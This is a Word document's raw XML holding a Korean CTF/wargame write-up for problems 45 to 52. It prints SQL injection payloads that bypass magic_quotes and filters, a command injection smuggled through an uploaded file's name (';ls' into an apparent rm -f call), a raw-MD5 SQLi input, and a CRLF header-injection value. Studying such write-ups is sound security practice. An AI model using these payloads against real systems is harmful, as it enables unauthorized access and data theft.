          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D63">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob45</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A03D63" w:rsidRDefault="00A03D63" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A3FD397" wp14:editId="5EDE8C32">
            <wp:extent cx="3000375" cy="1809750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"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A03D63" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3750FD22" wp14:editId="5DADB743">
            <wp:extent cx="5731510" cy="4582795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"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5B2F1A" w:rsidP="00D13C25">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>b_convert_encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00052619">
        <w:t>magic_quotes_gpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00052619">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 우회할 수 있는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00052619">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>멀티바이트</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00052619">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점이 존재한다.</w:t>
      </w:r>
      <w:r w:rsidR="00052619">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052619" w:rsidRDefault="00052619" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a1~%fc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>까지의 문자를 백슬래시 뒤에 넣으면 한 문자로 취급되어 버린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052619" w:rsidRDefault="00052619" w:rsidP="00D13C25">
      <w:r w:rsidRPr="00052619">
        <w:t>id=%a1' or 1 like 1%23&amp;pw=guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052619" w:rsidRDefault="00052619" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="119B26C0" wp14:editId="5C59A6F1">
            <wp:extent cx="3028950" cy="2190750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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/>
    <w:p w:rsidR="00052619" w:rsidRDefault="00052619" w:rsidP="00D13C25"/>
    <w:p w:rsidR="00052619" w:rsidRDefault="00052619" w:rsidP="00D13C25">
      <w:r w:rsidRPr="00052619">
        <w:lastRenderedPageBreak/>
        <w:t>id=%a1' or 1 like 1 and id like 0x61646D696E%23&amp;pw=guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052619" w:rsidRDefault="00052619" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C4AB20" wp14:editId="30738828">
            <wp:extent cx="5731510" cy="2019935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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Pr="00052619" w:rsidRDefault="00052619" w:rsidP="00052619">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052619">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00052619">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob46</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052619" w:rsidRDefault="00052619" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5749C4D5" wp14:editId="5B5ADDD3">
            <wp:extent cx="3067050" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE6764E" wp14:editId="5F5CBD83">
            <wp:extent cx="5731510" cy="3709670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080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>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 동작 방식만 알면 쉽게 풀 수 있는 문제다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2212" w:rsidRDefault="00DF2212" w:rsidP="00D13C25">
      <w:r w:rsidRPr="00DF2212">
        <w:t>lv=1%0dor%0d1%0dlike%0d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1를 하면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zzibong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2212" w:rsidRDefault="00DF2212" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22091782" wp14:editId="6607BDB5">
            <wp:extent cx="3171825" cy="2076450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"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>
      <w:r w:rsidRPr="00DF2212">
        <w:t>lv=2%0dor%0d1%0dlike%0d1%0dand%0did=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF2212">
        <w:t>char(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF2212">
        <w:t>97,100,109,105,110)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2212" w:rsidRDefault="00DF2212" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="286EBE27" wp14:editId="4388771B">
            <wp:extent cx="5731510" cy="2040890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"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Pr="00DF2212" w:rsidRDefault="00DF2212" w:rsidP="00DF2212">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2212">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2212">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob47</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2212" w:rsidRDefault="00DF2212" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB1D0CB" wp14:editId="24E55746">
            <wp:extent cx="5731510" cy="1640840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="426" name="그림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>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>참조</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Carbon copy), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>숨은 참조(</w:t>
      </w:r>
      <w:r>
        <w:t>Blind carbon copy)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용하면 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2212" w:rsidRDefault="00DF2212" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32168286" wp14:editId="215D12F5">
            <wp:extent cx="5200650" cy="5648325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"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Pr="00DF2212" w:rsidRDefault="00DF2212" w:rsidP="00DF2212">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2212">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2212">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob48</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2212" w:rsidRDefault="00DF2212" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26698C4F" wp14:editId="243E1549">
            <wp:extent cx="5657850" cy="4362450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6439DDB2" wp14:editId="059724A1">
            <wp:extent cx="2352675" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">파일을 올리면 </w:t>
      </w:r>
      <w:r>
        <w:t>upload file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">과 </w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 생긴다. </w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 누르면 아래와 같이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2212" w:rsidRDefault="00F1752D" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="361CD917" wp14:editId="11E6D7D3">
            <wp:extent cx="5391150" cy="2238375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72470E0A" wp14:editId="35A4D8EC">
            <wp:extent cx="5581650" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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:rsidR="00F1752D" w:rsidRDefault="00F1752D" w:rsidP="00D13C25">
      <w:r>
        <w:t>upload file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 누르면 위와 같이 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1752D" w:rsidRDefault="00F1752D" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>elete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 누르면 올라간 파일이 삭제되는 것을 보아 하니 r</w:t>
      </w:r>
      <w:r>
        <w:t>m -f upload/[filename]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>처럼 돼있을 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E88" w:rsidRDefault="00221E88" w:rsidP="00D13C25">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="gram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파일으로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 올린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E88" w:rsidRDefault="00221E88" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>elete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 누르면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E88" w:rsidRDefault="00221E88" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="147E6823" wp14:editId="1DF1E911">
            <wp:extent cx="5731510" cy="1047115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zwitter_admin.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같은 수상한 파일이 보인다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E88" w:rsidRDefault="00221E88" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CFB2133" wp14:editId="4EC2C942">
            <wp:extent cx="5731510" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"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Pr="00221E88" w:rsidRDefault="00221E88" w:rsidP="00221E88">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00221E88">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00221E88">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob49</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E88" w:rsidRDefault="00221E88" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71CF684F" wp14:editId="32E54058">
            <wp:extent cx="3257550" cy="1238250"/>
            <wp:effectExtent l="0" t="0" r="0" b="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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45BE4D1B" wp14:editId="2DD66462">
            <wp:extent cx="5731510" cy="4213860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00221E88">
        <w:t>lv=1||1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 넣으면</w:t>
      </w:r>
      <w:r w:rsidRPr="00221E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BB61B" wp14:editId="29E85F98">
            <wp:extent cx="762000" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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이 뜬다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E88" w:rsidRDefault="00221E88" w:rsidP="00D13C25">
      <w:r w:rsidRPr="00221E88">
        <w:t>lv=2||id=0x61646d696e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E88" w:rsidRDefault="00221E88" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1131B0A7" wp14:editId="7A7A34C1">
            <wp:extent cx="5731510" cy="2037715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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Pr="00465E78" w:rsidRDefault="00465E78" w:rsidP="00465E78">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465E78">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00465E78">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465E78" w:rsidRDefault="00465E78" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제 오류</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465E78" w:rsidRDefault="00465E78" w:rsidP="00D13C25"/>
    <w:p w:rsidR="00465E78" w:rsidRPr="00465E78" w:rsidRDefault="00465E78" w:rsidP="00465E78">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465E78">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00465E78">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob51</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465E78" w:rsidRDefault="00465E78" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47BE838E" wp14:editId="7E5CE199">
            <wp:extent cx="5731510" cy="3804285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"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Default="00465E78" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="464909FB" wp14:editId="11FAAF80">
            <wp:extent cx="5731510" cy="1643380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"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Default="002A72E2" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">함수의 두 번째 인자를 </w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 주면 반환을 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">binary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값으로 한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00224D1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서 공격 벡터를 발견할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224D1E" w:rsidRDefault="00224D1E" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B83D96F" wp14:editId="4716AA66">
            <wp:extent cx="5731510" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0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E" w:rsidRDefault="00224D1E" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이런 식으로 두 값이 다르면 모든 값이 나오므로 바이너리에서 </w:t>
      </w:r>
      <w:r>
        <w:t>‘=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 찾자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224D1E" w:rsidRDefault="00224D1E" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26808A45" wp14:editId="45E3FD6C">
            <wp:extent cx="2714625" cy="2809875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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E" w:rsidRDefault="00224D1E" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">근데 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>왜그런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먹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해서 다른 값을 넣었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224D1E" w:rsidRDefault="00224D1E" w:rsidP="00D13C25">
      <w:r w:rsidRPr="00224D1E">
        <w:t>!99442605num㎕9뻽</w:t>
      </w:r>
      <w:r w:rsidRPr="00224D1E">
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="00224D1E">
        <w:t>&amp;㏓</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00224D1E">
        <w:t>뽐</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00224D1E">
        <w:t>'='?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224D1E" w:rsidRDefault="00224D1E" w:rsidP="00D13C25"/>
    <w:p w:rsidR="00224D1E" w:rsidRDefault="00224D1E" w:rsidP="00D13C25"/>
    <w:p w:rsidR="00224D1E" w:rsidRPr="00224D1E" w:rsidRDefault="00224D1E" w:rsidP="00224D1E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00224D1E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00224D1E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob52</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224D1E" w:rsidRDefault="00224D1E" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="350451AC" wp14:editId="56E8DA5A">
            <wp:extent cx="4391025" cy="2314575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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i</w:t>
      </w:r>
      <w:r>
        <w:t>d=krrr%0dSet-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Cookie:%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>20id=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>krrr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 시도한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2B6B" w:rsidRDefault="000D2B6B" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B83145" wp14:editId="11452E97">
            <wp:extent cx="5731510" cy="1947545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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?</w:t>
      </w:r>
      <w:r>
        <w:t>???</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>clear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>라는 것이 하나 더 있었다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2B6B" w:rsidRDefault="000D2B6B" w:rsidP="00224D1E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF3F137" wp14:editId="540865B8">
            <wp:extent cx="3657600" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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B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C81509" wp14:editId="0F6292B2">
            <wp:extent cx="5731510" cy="2916555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"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Pr="000D2B6B" w:rsidRDefault="000D2B6B" w:rsidP="000D2B6B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2B6B">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2B6B">
        <w:rPr>
